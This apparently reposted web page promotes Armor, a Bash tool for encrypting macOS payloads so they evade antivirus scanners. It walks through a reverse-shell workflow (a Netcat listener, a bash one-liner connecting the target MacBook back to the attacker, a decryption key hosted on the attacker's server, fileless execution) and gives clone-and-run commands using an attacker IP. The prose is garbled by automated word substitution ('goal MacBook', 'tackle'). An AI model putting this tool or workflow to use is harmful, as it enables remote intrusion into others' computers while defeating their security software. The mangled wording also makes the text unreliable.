Armor – Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners

0
5
Armor - Tool Designed To Create Encrypted macOS Payloads Capable Of Evading Antivirus Scanners

Armor is an easy Bash script designed to create encrypted macOS payloads able to evading antivirus scanners. Below is an instance gif of Armor getting used with a easy Netcat payload.

A Netcat listener is began on port 4444. The “payload.txt” file is learn and proven to include a easy Bash one-liner that, when executed, will create a TCP connection between the goal MacBook on the attacker’s Netcat listener. Armor is used to encrypt the bash one-liner. Ncat is used to host the decryption key on the attacker’s server. When the stager is executed within the goal MacBook (not proven within the gif), the bash one-liner is decrypted and executed with out writing any knowledge to the harddrive. Ncat instantly terminates the listener after the important thing has been used. When the Netcat connection is established, the attacker has remote access to the goal MacBook.
Admittedly, encrypting most macOS-particular payloads is overkill. This particular bash one-liner is able to bypassing antivirus with out the assistance of Armor. But that is simply an exmaple. The similar diploma of obfuscation will be utilized to stylish Python, Ruby, and Shell scripts designed to execute quite a lot of superior assaults.

Installation
Armor depends on LibreSSL to encrypt the enter file and create the SSL certificates. If LibreSSL is not present in your system, Armor will try to put in it. The operate for this may be discovered within the armor.sh file. Ncat can be a dependency and will be put in in Kali utilizing $ apt-get replace && apt-get set up nmap.
Armor will be cloned and executed utilizing the beneath instructions.

git clone https://github.com/tokyoneon/Armor
cd Armor/
chmod +x armor.sh
./armor.sh /path/to/payload.txt 1.2.3.4 443

The 1.2.3.4 tackle is the attacker’s IP tackle the place the decryption key might be hosted. This generally is a native IP tackle or VPS. The port quantity (443), is bigoted and will be modified as wanted.
Questions and issues:

MoreTip.com

LEAVE A REPLY

Please enter your comment!
Please enter your name here

This site uses Akismet to reduce spam. Learn how your comment data is processed.